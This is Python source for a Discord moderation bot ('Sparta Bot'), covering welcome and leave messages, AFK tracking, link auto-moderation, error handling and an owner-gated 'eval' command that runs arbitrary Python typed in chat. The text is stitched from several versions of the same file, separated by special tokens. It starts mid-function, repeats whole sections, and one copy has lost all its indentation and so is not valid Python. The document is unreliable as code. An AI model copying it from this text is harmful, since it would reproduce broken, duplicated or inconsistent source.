        embed.add_field(name='Error Message:', value=
            f'{type(error)}:\n{error}', inline=False)
    await ctx.send(f'{error}')
def insert_returns(body):
    """Rewrite the final statement of *body* so its value is returned.

    Recurses into a trailing ``if``/``with`` so the deepest trailing
    expression becomes an explicit ``return``.
    NOTE(review): an ``if`` with no ``else`` leaves ``orelse`` empty, so
    ``body[-1]`` would raise IndexError — same as the original; confirm
    callers never pass that shape.
    """
    last = body[-1]
    if isinstance(last, ast.Expr):
        body[-1] = ast.Return(last.value)
        ast.fix_missing_locations(body[-1])
    elif isinstance(last, ast.If):
        insert_returns(last.body)
        insert_returns(last.orelse)
    elif isinstance(last, ast.With):
        insert_returns(last.body)
@bot.command(name='eval')
async def eval_fn(ctx, *, cmd):
    """Evaluate arbitrary Python typed in chat (owner-only).

    Input is interpreted as newline-separated statements; if the last
    statement is an expression, its value becomes the command's result.

    Usable globals inside the evaluated code:
      - ``bot``: the bot instance
      - ``discord``: the discord module
      - ``commands``: the discord.ext.commands module
      - ``ctx``: the invocation context
      - ``__import__``: the builtin ``__import__`` function

    Example: ``>eval 1 + 1`` gives ``2``.

    SECURITY: this executes arbitrary code; it is gated to the two
    hard-coded user IDs below and must stay that way.
    """
    if ctx.message.author.id not in [400857098121904149, 733532987794128897]:
        await ctx.send('You are not authorized to run this command')
        return
    fn_name = '_eval_expr'
    # Strip code-fence backticks, indent each line, and wrap the whole
    # input in an async function so 'await' is allowed.
    cmd = cmd.strip('` ')
    cmd = '\n'.join(f' {i}' for i in cmd.splitlines())
    body = f'async def {fn_name}():\n{cmd}'
    parsed = ast.parse(body)
    body = parsed.body[0].body
    # Turn the trailing expression (if any) into an explicit return.
    insert_returns(body)
    env = {'bot': ctx.bot, 'discord': discord, 'commands': commands, 'ctx':
        ctx, '__import__': __import__}
    # Define the wrapper in `env`, then await it to get the result.
    exec(compile(parsed, filename='<ast>', mode='exec'), env)
    result = await eval(f'{fn_name}()', env)
    await ctx.send(result)
@bot.command(name='data')
async def data(ctx):
    # Owner-only (bot owner or the hard-coded dev ID): upload the raw
    # persisted data file to the current channel.
    is_owner = await bot.is_owner(ctx.author)
    if is_owner or ctx.author.id == 733532987794128897:
        data_file = discord.File('data.json')
        await ctx.send(file=data_file)
@bot.event
async def on_message(message: discord.Message):
    """Global message hook: prefix hint on mention, AFK tracking,
    'F' pay-respects reply, and link/attachment auto-moderation.

    Fixes over the original:
    - iterate a copy of data['afks'] (entries were removed from the same
      list while iterating it, which skips the following entry);
    - skip AFK entries whose member has left the guild (guild.get_member
      returns None, which crashed on .id).
    """
    global previous_msg_sender_id
    if message.author.bot:
        return
    author: discord.Member = message.author
    channel: discord.TextChannel = message.channel
    guild: discord.Guild = message.guild
    await bot.process_commands(message)
    # Lazily create this guild's settings record on first message.
    if str(guild.id) not in Data.server_data:
        Data.server_data[str(guild.id)] = Data.create_new_data()
    data = Data.server_data[str(guild.id)]
    # Bare bot mention ('!' stripped to cover nickname mentions) replies
    # with the configured prefix.
    if message.content.replace('!', '') == bot.user.mention:
        pre = data['prefix']
        await channel.send(f'The prefix in this server is `{pre}`')
    # Iterate over a snapshot: entries may be removed inside the loop.
    for afk_user_entry in list(data['afks']):
        afk_user_id = int(afk_user_entry['user'])
        afk_reason = afk_user_entry['reason']
        afk_user = guild.get_member(afk_user_id)
        if afk_user is None:
            # Member is no longer in the guild; nothing to announce.
            continue
        if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:
            # The AFK user sent a second consecutive message: clear AFK.
            Data.server_data[str(guild.id)]['afks'].remove(afk_user_entry)
            await channel.send(f'**{afk_user}** is no longer AFK.')
        elif afk_user in message.mentions:
            await channel.send(
                f'**{afk_user}** is currently AFK because **{afk_reason}**.')
    if data['pay_respects'] and message.content.strip().lower() == 'f':
        await channel.send(
            f'**{author.display_name}** has paid their respects...')
    # Auto-mod: only when enabled, and the author/channel is not exempt.
    if data['active'] and str(author.id) not in data['users']:
        if not str(channel.id) in data['channels']:
            perms = author.permissions_in(channel)
            if not perms.administrator:
                if ('http://' in message.content or 'https://' in message.
                    content):
                    if len(data['urls']) > 0:
                        # NOTE(review): this deletes once per allowlisted
                        # URL *not* contained in the message, even when an
                        # allowed URL is present — confirm intended logic.
                        for url in data['urls']:
                            if not url in message.content:
                                await channel.purge(limit=1)
                                msg1 = await channel.send(
                                    f'{author.mention}, you are not allowed to send links in this channel.'
                                    )
                                await asyncio.sleep(2)
                                await msg1.delete()
                    else:
                        await channel.purge(limit=1)
                        msg2 = await channel.send(
                            f'{author.mention}, you are not allowed to send links in this channel.'
                            )
                        await asyncio.sleep(3)
                        await msg2.delete()
                elif len(message.attachments) > 0:
                    await channel.purge(limit=1)
                    msg3 = await channel.send(
                        f'{author.mention}, you are not allowed to send attachments in this channel.'
                        )
                    await asyncio.sleep(3)
                    await msg3.delete()
    # Remembered across messages for the AFK double-message check above.
    previous_msg_sender_id = author.id
bot.run(TOKEN)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
# Bot token from the environment; the members intent is required for the
# member join/leave events used below.
TOKEN = os.getenv('SPARTA_TOKEN')
intents = discord.Intents.default()
intents.members = True
def get_prefix(client, message):
if str(message.guild.id) not in Data.server_data:
Data.server_data[str(message.guild.id)] = Data.create_new_data()
data = Data.server_data[str(message.guild.id)]
return data['prefix']
PREFIX = get_prefix
bot = commands.Bot(command_prefix=PREFIX, description=
'I am Sparta Bot, a bot for the Official Sparta Gaming Discord server.',
intents=intents, help_command=None, case_insensitive=True)
THEME_COLOR = discord.Colour.blue()
bot.add_cog(Miscellaneous(bot, THEME_COLOR))
bot.add_cog(ServerSettings(bot, THEME_COLOR))
bot.add_cog(Moderator(bot, THEME_COLOR))
bot.add_cog(AutoMod(bot, THEME_COLOR))
bot.add_cog(Fun(bot, THEME_COLOR))
bot.add_cog(Google(bot, THEME_COLOR))
previous_msg_sender_id = None
@bot.event
async def on_ready():
bot.loop.create_task(Data.auto_update_data())
bot.loop.create_task(update_presence(bot, PREFIX))
print('Bot is ready...')
@bot.event
async def on_guild_join(guild):
log_channel = bot.get_channel(773580297954394162)
await log_channel.send(
f'Joined - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}'
)
@bot.event
async def on_guild_remove(guild):
log_channel = bot.get_channel(773580297954394162)
await log_channel.send(
f'Left - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}')
@bot.event
async def on_member_join(member):
guild: discord.Guild = member.guild
channels = guild.channels
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
print(f'{member} has joined {guild} server...')
join_role = guild.get_role(data['join_role'])
if join_role is not None:
await member.add_roles(join_role)
if data['welcome_msg'] is None:
server_wlcm_msg = (
f'Welcome, {member.mention}, to the Official **{guild.name}** Server'
)
else:
server_wlcm_msg = data['welcome_msg']
server_wlcm_msg = server_wlcm_msg.replace('[mention]',
f'{member.mention}')
wel_channel = None
if data['welcome_channel'] is None:
for channel in channels:
if str(channel).find('welcome') != -1:
wel_channel = channel
break
else:
wel_channel = guild.get_channel(int(data['welcome_channel']))
try:
await wel_channel.send(server_wlcm_msg)
except AttributeError:
print('DEBUG: No welcome channel has been set or found.')
@bot.command(name='remove_welcome', aliases=['rwel', 'remwel'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_welcome(ctx, *, channel):
if str(ctx.guild.id) not in Data.server_data:
Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
Data.server_data[str(ctx.guild.id)]['welcome_channel'] = channel
await ctx.send("This server's welcome channel has been removed")
@bot.event
async def on_member_remove(member):
guild = member.guild
channels = guild.channels
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
print(f'{member} has left the {guild.name}...')
if data['leave_msg'] is None:
server_leave_msg = (
f'Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server'
)
else:
server_leave_msg = data['leave_msg']
server_leave_msg = server_leave_msg.replace('[member]', f'{member}')
lv_channel = None
if data['leave_channel'] is None:
for channel in channels:
if str(channel).find('bye') != -1 or str(channel).find('leave'
) != -1:
lv_channel = channel
break
else:
lv_channel = guild.get_channel(int(data['leave_channel']))
try:
await lv_channel.send(server_leave_msg)
except AttributeError:
print('DEBUG: No leave channel has been set or found.')
@bot.command(name='remove_leave', aliases=['rleave', 'remleave'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_welcome(ctx, *, channel):
if str(ctx.guild.id) not in Data.server_data:
Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
Data.server_data[str(ctx.guild.id)]['leave_channel'] = channel
await ctx.send("This server's leave channel has been Removed")
@bot.event
async def on_command_error(ctx, error):
try:
error = error.original
except Exception:
pass
if type(error) is discord.ext.commands.errors.CommandNotFound:
return
elif type(error) is discord.ext.commands.errors.BadArgument:
pass
elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:
pass
elif type(error) is discord.ext.commands.errors.NoPrivateMessage:
pass
elif type(error) is discord.ext.commands.errors.MissingPermissions:
pass
elif type(error) is discord.ext.commands.errors.NotOwner:
pass
elif type(error) is discord.ext.commands.errors.CommandOnCooldown:
pass
elif type(error) is discord.ext.commands.errors.ChannelNotFound:
pass
elif type(error) is discord.ext.commands.errors.BadUnionArgument:
pass
elif type(error) is discord.ext.commands.errors.BotMissingPermissions:
pass
elif type(error) is discord.errors.Forbidden:
error = "I don't have permission to do that!"
else:
print(f'Error {type(error)}: {error}')
traceback.print_exception(type(error), error, error.__traceback__,
file=sys.stderr)
embed = discord.Embed(title='Error!', description=
'An unexpected error ocurred. Please report this to the dev.'
)
embed.add_field(name='Error Message:', value=
f'{type(error)}:\n{error}', inline=False)
await ctx.send(f'{error}')
def insert_returns(body):
if isinstance(body[-1], ast.Expr):
body[-1] = ast.Return(body[-1].value)
ast.fix_missing_locations(body[-1])
if isinstance(body[-1], ast.If):
insert_returns(body[-1].body)
insert_returns(body[-1].orelse)
if isinstance(body[-1], ast.With):
insert_returns(body[-1].body)
@bot.command(name='eval')
async def eval_fn(ctx, *, cmd):
"""Evaluates input.
Input is interpreted as newline seperated statements.
If the last statement is an expression, that is the return value.
Usable globals:
- `bot`: the bot instance
- `discord`: the discord module
- `commands`: the discord.ext.commands module
- `ctx`: the invokation context
- `__import__`: the builtin `__import__` function
Such that `>eval 1 + 1` gives `2` as the result.
The following invokation will cause the bot to send the text '9'
to the channel of invokation and return '3' as the result of evaluating
>eval ```
a = 1 + 2
b = a * 2
await ctx.send(a + b)
a
```
"""
if ctx.message.author.id not in [400857098121904149, 733532987794128897]:
await ctx.send('You are not authorized to run this command')
return
fn_name = '_eval_expr'
cmd = cmd.strip('` ')
cmd = '\n'.join(f' {i}' for i in cmd.splitlines())
body = f'async def {fn_name}():\n{cmd}'
parsed = ast.parse(body)
body = parsed.body[0].body
insert_returns(body)
env = {'bot': ctx.bot, 'discord': discord, 'commands': commands, 'ctx':
ctx, '__import__': __import__}
exec(compile(parsed, filename='<ast>', mode='exec'), env)
result = await eval(f'{fn_name}()', env)
await ctx.send(result)
@bot.command(name='data')
async def data(ctx):
is_owner = await bot.is_owner(ctx.author)
if is_owner or ctx.author.id == 733532987794128897:
data_file = discord.File('data.json')
await ctx.send(file=data_file)
@bot.event
async def on_message(message: discord.Message):
global previous_msg_sender_id
if message.author.bot:
return
author: discord.Member = message.author
channel: discord.TextChannel = message.channel
guild: discord.Guild = message.guild
await bot.process_commands(message)
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
if message.content.replace('!', '') == bot.user.mention:
pre = data['prefix']
await channel.send(f'The prefix in this server is `{pre}`')
for afk_user_entry in data['afks']:
afk_user_id = int(afk_user_entry['user'])
afk_reason = afk_user_entry['reason']
afk_user = guild.get_member(afk_user_id)
if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:
Data.server_data[str(guild.id)]['afks'].remove(afk_user_entry)
await channel.send(f'**{afk_user}** is no longer AFK.')
elif afk_user in message.mentions:
await channel.send(
f'**{afk_user}** is currently AFK because **{afk_reason}**.')
if data['pay_respects'] and message.content.strip().lower() == 'f':
await channel.send(
f'**{author.display_name}** has paid their respects...')
if data['active'] and str(author.id) not in data['users']:
if not str(channel.id) in data['channels']:
perms = author.permissions_in(channel)
if not perms.administrator:
if ('http://' in message.content or 'https://' in message.
content):
if len(data['urls']) > 0:
for url in data['urls']:
if not url in message.content:
await channel.purge(limit=1)
msg1 = await channel.send(
f'{author.mention}, you are not allowed to send links in this channel.'
)
await asyncio.sleep(2)
await msg1.delete()
else:
await channel.purge(limit=1)
msg2 = await channel.send(
f'{author.mention}, you are not allowed to send links in this channel.'
)
await asyncio.sleep(3)
await msg2.delete()
elif len(message.attachments) > 0:
await channel.purge(limit=1)
msg3 = await channel.send(
f'{author.mention}, you are not allowed to send attachments in this channel.'
)
await asyncio.sleep(3)
await msg3.delete()
previous_msg_sender_id = author.id
bot.run(TOKEN)
<|reserved_special_token_1|>
import os
import subprocess
import discord
import asyncio
import traceback
import sys
import ast
from discord.ext import commands
from cogs.misc import Miscellaneous
from cogs.serversettings import ServerSettings
from cogs.mod import Moderator
from cogs.automod import AutoMod
from cogs.google import Google
from cogs.fun import Fun
from otherscipts.helpers import update_presence
from otherscipts.data import Data
TOKEN = os.getenv('SPARTA_TOKEN')
intents = discord.Intents.default()
intents.members = True
def get_prefix(client, message):
if str(message.guild.id) not in Data.server_data:
Data.server_data[str(message.guild.id)] = Data.create_new_data()
data = Data.server_data[str(message.guild.id)]
return data['prefix']
PREFIX = get_prefix
bot = commands.Bot(command_prefix=PREFIX, description=
'I am Sparta Bot, a bot for the Official Sparta Gaming Discord server.',
intents=intents, help_command=None, case_insensitive=True)
THEME_COLOR = discord.Colour.blue()
bot.add_cog(Miscellaneous(bot, THEME_COLOR))
bot.add_cog(ServerSettings(bot, THEME_COLOR))
bot.add_cog(Moderator(bot, THEME_COLOR))
bot.add_cog(AutoMod(bot, THEME_COLOR))
bot.add_cog(Fun(bot, THEME_COLOR))
bot.add_cog(Google(bot, THEME_COLOR))
previous_msg_sender_id = None
@bot.event
async def on_ready():
bot.loop.create_task(Data.auto_update_data())
bot.loop.create_task(update_presence(bot, PREFIX))
print('Bot is ready...')
@bot.event
async def on_guild_join(guild):
log_channel = bot.get_channel(773580297954394162)
await log_channel.send(
f'Joined - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}'
)
@bot.event
async def on_guild_remove(guild):
log_channel = bot.get_channel(773580297954394162)
await log_channel.send(
f'Left - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}')
@bot.event
async def on_member_join(member):
guild: discord.Guild = member.guild
channels = guild.channels
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
print(f'{member} has joined {guild} server...')
join_role = guild.get_role(data['join_role'])
if join_role is not None:
await member.add_roles(join_role)
if data['welcome_msg'] is None:
server_wlcm_msg = (
f'Welcome, {member.mention}, to the Official **{guild.name}** Server'
)
else:
server_wlcm_msg = data['welcome_msg']
server_wlcm_msg = server_wlcm_msg.replace('[mention]',
f'{member.mention}')
wel_channel = None
if data['welcome_channel'] is None:
for channel in channels:
if str(channel).find('welcome') != -1:
wel_channel = channel
break
else:
wel_channel = guild.get_channel(int(data['welcome_channel']))
try:
await wel_channel.send(server_wlcm_msg)
except AttributeError:
print('DEBUG: No welcome channel has been set or found.')
@bot.command(name='remove_welcome', aliases=['rwel', 'remwel'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_welcome(ctx, *, channel):
if str(ctx.guild.id) not in Data.server_data:
Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
Data.server_data[str(ctx.guild.id)]['welcome_channel'] = channel
await ctx.send("This server's welcome channel has been removed")
@bot.event
async def on_member_remove(member):
guild = member.guild
channels = guild.channels
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
print(f'{member} has left the {guild.name}...')
if data['leave_msg'] is None:
server_leave_msg = (
f'Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server'
)
else:
server_leave_msg = data['leave_msg']
server_leave_msg = server_leave_msg.replace('[member]', f'{member}')
lv_channel = None
if data['leave_channel'] is None:
for channel in channels:
if str(channel).find('bye') != -1 or str(channel).find('leave'
) != -1:
lv_channel = channel
break
else:
lv_channel = guild.get_channel(int(data['leave_channel']))
try:
await lv_channel.send(server_leave_msg)
except AttributeError:
print('DEBUG: No leave channel has been set or found.')
@bot.command(name='remove_leave', aliases=['rleave', 'remleave'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_welcome(ctx, *, channel):
if str(ctx.guild.id) not in Data.server_data:
Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
Data.server_data[str(ctx.guild.id)]['leave_channel'] = channel
await ctx.send("This server's leave channel has been Removed")
@bot.event
async def on_command_error(ctx, error):
try:
error = error.original
except Exception:
pass
if type(error) is discord.ext.commands.errors.CommandNotFound:
return
elif type(error) is discord.ext.commands.errors.BadArgument:
pass
elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:
pass
elif type(error) is discord.ext.commands.errors.NoPrivateMessage:
pass
elif type(error) is discord.ext.commands.errors.MissingPermissions:
pass
elif type(error) is discord.ext.commands.errors.NotOwner:
pass
elif type(error) is discord.ext.commands.errors.CommandOnCooldown:
pass
elif type(error) is discord.ext.commands.errors.ChannelNotFound:
pass
elif type(error) is discord.ext.commands.errors.BadUnionArgument:
pass
elif type(error) is discord.ext.commands.errors.BotMissingPermissions:
pass
elif type(error) is discord.errors.Forbidden:
error = "I don't have permission to do that!"
else:
print(f'Error {type(error)}: {error}')
traceback.print_exception(type(error), error, error.__traceback__,
file=sys.stderr)
embed = discord.Embed(title='Error!', description=
'An unexpected error ocurred. Please report this to the dev.'
)
embed.add_field(name='Error Message:', value=
f'{type(error)}:\n{error}', inline=False)
await ctx.send(f'{error}')
def insert_returns(body):
if isinstance(body[-1], ast.Expr):
body[-1] = ast.Return(body[-1].value)
ast.fix_missing_locations(body[-1])
if isinstance(body[-1], ast.If):
insert_returns(body[-1].body)
insert_returns(body[-1].orelse)
if isinstance(body[-1], ast.With):
insert_returns(body[-1].body)
@bot.command(name='eval')
async def eval_fn(ctx, *, cmd):
"""Evaluates input.
Input is interpreted as newline seperated statements.
If the last statement is an expression, that is the return value.
Usable globals:
- `bot`: the bot instance
- `discord`: the discord module
- `commands`: the discord.ext.commands module
- `ctx`: the invokation context
- `__import__`: the builtin `__import__` function
Such that `>eval 1 + 1` gives `2` as the result.
The following invokation will cause the bot to send the text '9'
to the channel of invokation and return '3' as the result of evaluating
>eval ```
a = 1 + 2
b = a * 2
await ctx.send(a + b)
a
```
"""
if ctx.message.author.id not in [400857098121904149, 733532987794128897]:
await ctx.send('You are not authorized to run this command')
return
fn_name = '_eval_expr'
cmd = cmd.strip('` ')
cmd = '\n'.join(f' {i}' for i in cmd.splitlines())
body = f'async def {fn_name}():\n{cmd}'
parsed = ast.parse(body)
body = parsed.body[0].body
insert_returns(body)
env = {'bot': ctx.bot, 'discord': discord, 'commands': commands, 'ctx':
ctx, '__import__': __import__}
exec(compile(parsed, filename='<ast>', mode='exec'), env)
result = await eval(f'{fn_name}()', env)
await ctx.send(result)
@bot.command(name='data')
async def data(ctx):
is_owner = await bot.is_owner(ctx.author)
if is_owner or ctx.author.id == 733532987794128897:
data_file = discord.File('data.json')
await ctx.send(file=data_file)
@bot.event
async def on_message(message: discord.Message):
global previous_msg_sender_id
if message.author.bot:
return
author: discord.Member = message.author
channel: discord.TextChannel = message.channel
guild: discord.Guild = message.guild
await bot.process_commands(message)
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
if message.content.replace('!', '') == bot.user.mention:
pre = data['prefix']
await channel.send(f'The prefix in this server is `{pre}`')
for afk_user_entry in data['afks']:
afk_user_id = int(afk_user_entry['user'])
afk_reason = afk_user_entry['reason']
afk_user = guild.get_member(afk_user_id)
if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:
Data.server_data[str(guild.id)]['afks'].remove(afk_user_entry)
await channel.send(f'**{afk_user}** is no longer AFK.')
elif afk_user in message.mentions:
await channel.send(
f'**{afk_user}** is currently AFK because **{afk_reason}**.')
if data['pay_respects'] and message.content.strip().lower() == 'f':
await channel.send(
f'**{author.display_name}** has paid their respects...')
if data['active'] and str(author.id) not in data['users']:
if not str(channel.id) in data['channels']:
perms = author.permissions_in(channel)
if not perms.administrator:
if ('http://' in message.content or 'https://' in message.
content):
if len(data['urls']) > 0:
for url in data['urls']:
if not url in message.content:
await channel.purge(limit=1)
msg1 = await channel.send(
f'{author.mention}, you are not allowed to send links in this channel.'
)
await asyncio.sleep(2)
await msg1.delete()
else:
await channel.purge(limit=1)
msg2 = await channel.send(
f'{author.mention}, you are not allowed to send links in this channel.'
)
await asyncio.sleep(3)
await msg2.delete()
elif len(message.attachments) > 0:
await channel.purge(limit=1)
msg3 = await channel.send(
f'{author.mention}, you are not allowed to send attachments in this channel.'
)
await asyncio.sleep(3)
await msg3.delete()
previous_msg_sender_id = author.id
bot.run(TOKEN)
<|reserved_special_token_1|>
import os
import subprocess
import discord
import asyncio
import traceback
import sys
import ast
from discord.ext import commands
# Import Cogs
from cogs.misc import Miscellaneous
from cogs.serversettings import ServerSettings
from cogs.mod import Moderator
from cogs.automod import AutoMod
from cogs.google import Google
# Minigame/Fun Cogs
from cogs.fun import Fun
#from cogs.hangman import Hangman
#from cogs.rps import RockPaperScissors
from otherscipts.helpers import update_presence
from otherscipts.data import Data
# Bot token is read from the environment so it never lives in source control.
TOKEN = os.getenv('SPARTA_TOKEN')
# The members intent is privileged — it must also be enabled for this bot in
# the Discord developer portal, or member join/leave events will not fire.
intents = discord.Intents.default()
intents.members = True
def get_prefix(client, message):
    """Return the command prefix configured for the message's guild.

    A fresh data record is created for guilds seen for the first time,
    so the prefix lookup below can never raise KeyError.
    """
    guild_key = str(message.guild.id)
    if guild_key not in Data.server_data:
        Data.server_data[guild_key] = Data.create_new_data()
    return Data.server_data[guild_key]["prefix"]
# commands.Bot accepts a callable prefix: discord.py re-evaluates it for each
# incoming message, which lets every guild configure its own prefix.
PREFIX = get_prefix
bot = commands.Bot(
    command_prefix=PREFIX,
    description="I am Sparta Bot, a bot for the Official Sparta Gaming Discord server.",
    intents=intents,
    help_command=None,
    case_insensitive=True
)
# Accent colour shared by all cogs when they build embeds.
THEME_COLOR = discord.Colour.blue()
# Add Cogs
bot.add_cog(Miscellaneous(bot, THEME_COLOR))
bot.add_cog(ServerSettings(bot, THEME_COLOR))
bot.add_cog(Moderator(bot, THEME_COLOR))
bot.add_cog(AutoMod(bot, THEME_COLOR))
bot.add_cog(Fun(bot, THEME_COLOR))
bot.add_cog(Google(bot, THEME_COLOR))
#bot.add_cog(Hangman(bot, THEME_COLOR))
#bot.add_cog(RockPaperScissors(bot, THEME_COLOR))
# Author ID of the previously processed message; the AFK logic in on_message
# clears a user's AFK status only on their *second* consecutive message.
previous_msg_sender_id = None
@bot.event
async def on_ready():
    """Start the periodic background jobs once the gateway session is live."""
    background_jobs = (Data.auto_update_data(), update_presence(bot, PREFIX))
    for job in background_jobs:
        bot.loop.create_task(job)
    print("Bot is ready...")
@bot.event
async def on_guild_join(guild):
    """Report every server the bot joins to the hard-coded audit log channel."""
    audit_channel = bot.get_channel(773580297954394162)
    report = f"Joined - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}"
    await audit_channel.send(report)
@bot.event
async def on_guild_remove(guild):
    """Report every server the bot leaves to the hard-coded audit log channel."""
    audit_channel = bot.get_channel(773580297954394162)
    report = f"Left - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}"
    await audit_channel.send(report)
@bot.event
async def on_member_join(member):
    """Grant the configured join role and greet the newcomer.

    The greeting goes to the explicitly configured welcome channel if one
    is set, otherwise to the first channel whose name contains "welcome".
    """
    guild: discord.Guild = member.guild
    guild_key = str(guild.id)
    if guild_key not in Data.server_data:
        Data.server_data[guild_key] = Data.create_new_data()
    data = Data.server_data[guild_key]
    print(f"{member} has joined {guild} server...")

    join_role = guild.get_role(data["join_role"])
    if join_role is not None:
        await member.add_roles(join_role)

    # Resolve the greeting text: stock message unless one was configured.
    if data["welcome_msg"] is None:
        greeting = f"Welcome, {member.mention}, to the Official **{guild.name}** Server"
    else:
        greeting = data["welcome_msg"]
    # "[mention]" is the placeholder users may put in a custom message.
    greeting = greeting.replace("[mention]", f"{member.mention}")

    # Resolve the destination channel.
    if data["welcome_channel"] is not None:
        destination = guild.get_channel(int(data["welcome_channel"]))
    else:
        destination = next(
            (ch for ch in guild.channels if "welcome" in str(ch)), None
        )
    try:
        await destination.send(greeting)
    except AttributeError:
        print("DEBUG: No welcome channel has been set or found.")
# Remove welcome channel
@bot.command(name="remove_welcome", aliases=['rwel', 'remwel'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_welcome(ctx, *, channel=None):
    """Clear this server's configured welcome channel.

    BUG FIX: the original stored the raw ``channel`` argument text here,
    which on_member_join would later feed to ``int(...)`` and crash.
    "Removing" must store None — the value on_member_join treats as
    "unset" (falls back to searching for a channel named *welcome*).
    The trailing argument is kept (now optional) for backward
    compatibility but is ignored.
    """
    if str(ctx.guild.id) not in Data.server_data:
        Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
    Data.server_data[str(ctx.guild.id)]["welcome_channel"] = None
    await ctx.send("This server's welcome channel has been removed")
@bot.event
async def on_member_remove(member):
    """Announce a departure in the configured (or auto-detected) leave channel."""
    guild = member.guild
    guild_key = str(guild.id)
    if guild_key not in Data.server_data:
        Data.server_data[guild_key] = Data.create_new_data()
    data = Data.server_data[guild_key]
    print(f"{member} has left the {guild.name}...")

    # Resolve the farewell text: stock message unless one was configured.
    custom_msg = data["leave_msg"]
    if custom_msg is None:
        farewell = f"Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server"
    else:
        # "[member]" is the placeholder users may put in a custom message.
        farewell = custom_msg.replace("[member]", f"{member}")

    # Resolve the destination: explicit setting wins, otherwise the first
    # channel whose name mentions "bye" or "leave".
    if data["leave_channel"] is not None:
        destination = guild.get_channel(int(data["leave_channel"]))
    else:
        destination = next(
            (ch for ch in guild.channels
             if "bye" in str(ch) or "leave" in str(ch)),
            None,
        )
    try:
        await destination.send(farewell)
    except AttributeError:
        print("DEBUG: No leave channel has been set or found.")
# Remove leave
@bot.command(name="remove_leave", aliases=['rleave', 'remleave'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_leave(ctx, *, channel=None):
    """Clear this server's configured leave channel.

    BUG FIXES: (1) the coroutine was previously also named
    ``remove_welcome``, silently shadowing the welcome command's function
    at module level; it is renamed to match its command. (2) The original
    stored the raw ``channel`` argument text, which on_member_remove would
    later feed to ``int(...)`` and crash — "removing" must store None,
    the value the leave handler treats as "unset". The trailing argument
    is kept (now optional) for backward compatibility but is ignored.
    """
    if str(ctx.guild.id) not in Data.server_data:
        Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
    Data.server_data[str(ctx.guild.id)]["leave_channel"] = None
    await ctx.send("This server's leave channel has been Removed")
@bot.event
async def on_command_error(ctx, error):
    """Global command-error hook.

    Known discord.py command errors are echoed back to the channel as
    plain text; unexpected ones additionally get a full traceback on
    stderr. Unknown commands are ignored entirely.
    """
    # CommandInvokeError wraps the real exception in .original; unwrap it
    # when present, otherwise keep the error as-is.
    try:
        error = error.original
    except Exception:
        pass
    # NOTE: these are exact-type checks (`type(...) is`), so subclasses of
    # the listed error types are NOT matched and fall into the else branch.
    if type(error) is discord.ext.commands.errors.CommandNotFound:
        # Unknown command: stay silent.
        return
    elif type(error) is discord.ext.commands.errors.BadArgument:
        pass
    elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:
        pass
    elif type(error) is discord.ext.commands.errors.NoPrivateMessage:
        pass
    elif type(error) is discord.ext.commands.errors.MissingPermissions:
        pass
    elif type(error) is discord.ext.commands.errors.NotOwner:
        pass
    elif type(error) is discord.ext.commands.errors.CommandOnCooldown:
        pass
    elif type(error) is discord.ext.commands.errors.ChannelNotFound:
        pass
    elif type(error) is discord.ext.commands.errors.BadUnionArgument:
        pass
    elif type(error) is discord.ext.commands.errors.BotMissingPermissions:
        pass
    elif type(error) is discord.errors.Forbidden:
        # Replace the raw Forbidden error with a friendlier message.
        error = "I don't have permission to do that!"
    else:
        # Unexpected error: log it with a full traceback for the dev.
        print(f"Error {type(error)}: {error}")
        traceback.print_exception(
            type(error), error, error.__traceback__, file=sys.stderr
        )
        # NOTE(review): this embed is constructed but never sent — only the
        # plain-text send below reaches the channel. Confirm whether the
        # embed was meant to be passed to ctx.send(embed=embed).
        embed = discord.Embed(
            title='Error!',
            description='An unexpected error ocurred.\
                Please report this to the dev.',
        )
        embed.add_field(
            name='Error Message:',
            value=f"{type(error)}:\n{error}",
            inline=False
        )
    # Every non-silent path ends by echoing the (possibly rewritten) error.
    await ctx.send(f"{error}")
# LABEL: Programming Commands
def insert_returns(body):
    """Rewrite a parsed statement list in place so its tail yields a value.

    If the last statement is a bare expression it becomes a ``return``;
    for trailing ``if``/``with`` blocks the rewrite recurses into their
    bodies. Used by the eval command to make the last expression of the
    user's snippet the coroutine's return value.
    """
    # BUG FIX: an `if` with no `else` has an empty orelse list; recursing
    # into it made `body[-1]` raise IndexError in the original.
    if not body:
        return
    # insert return stmt if the last expression is a expression statement
    if isinstance(body[-1], ast.Expr):
        body[-1] = ast.Return(body[-1].value)
        ast.fix_missing_locations(body[-1])
